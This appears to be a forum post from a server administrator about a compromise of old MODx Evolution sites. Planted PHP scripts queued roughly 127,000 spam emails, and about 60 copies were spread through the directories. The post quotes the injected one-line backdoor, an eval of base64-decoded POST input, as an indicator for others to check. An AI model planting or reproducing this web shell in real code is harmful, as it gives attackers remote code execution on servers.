This affected our servers on the weekend. The above mentioned script hacks queued around 127,000 SPAM emails to our server in 24 hours and caused all sorts of load issues.
The interesting thing here is the oldest of these scripts dates right back to October 2012, it was just sitting there all this time. Then recently around 60 copies of it were created or existing scripts modified all through the directories.
This is what was added as an example:
<?php eval(base64_decode($_POST['na04af1'])); ?>
The $_POST variable is usually different across different sites.
I haven't been able to ascertain the entry point for these scripts at this time but it does appear to be from a web request to MODx. These files were not uploaded through SFTP/FTP.
This has also hugely affected a partner company we work with, across six servers, all hacks were affecting old versions of Evolution only from what we can see so far.